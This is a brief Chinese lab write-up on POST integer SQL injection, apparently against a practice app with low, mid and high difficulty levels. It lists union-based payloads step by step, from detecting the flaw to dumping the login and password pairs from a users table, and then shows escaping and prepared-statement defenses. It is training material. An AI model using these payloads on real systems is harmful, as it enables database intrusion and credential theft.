POST整型注入
判断是否存在注入
1+and+1=1#
1+and+1=2#
判断注入字段个数
1+order+by+7#
1+order+by+8#
判断注入字段位置
0+union+select+1,2,3,4,5,6,7#
获取数据库信息
0+union+select+1,database(),version(),user(),5,6,7#
获取表名
0+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3,4,5,6,7#
获取列名
0+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+and+table_schema=database()),3,4,5,6,7#
获取信息
0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#
演练
low
0+union+select+1,(select+group_concat(login,'-',password,'-')+from+users),3,4,5,6,7#
mid
使用mysql_real_escape_string
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
high
使用预处理语句防止注入
$id = $_POST["movie"];
$sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";
if($stmt = $link->prepare($sql))
// if($stmt = mysqli_prepare($link, $sql))
{
// Binds the parameters for markers
$stmt->bind_param("s", $id);
// mysqli_stmt_bind_param($stmt, "s", $id);
// Executes the query
$stmt->execute();
// mysqli_stmt_execute($stmt);
// Binds the result variables
$stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
// mysqli_stmt_bind_result($stmt, $title, $release_year, $genre, $main_character, $imdb);
// Stores the result, necessary to count the number of rows
$stmt->store_result();
// mysqli_stmt_store_result($stmt);
// Prints the number of rows
// printf("Number of rows: %d.\n", mysqli_stmt_num_rows($stmt));
// printf("Number of rows: %d.\n", $stmt->num_rows);
}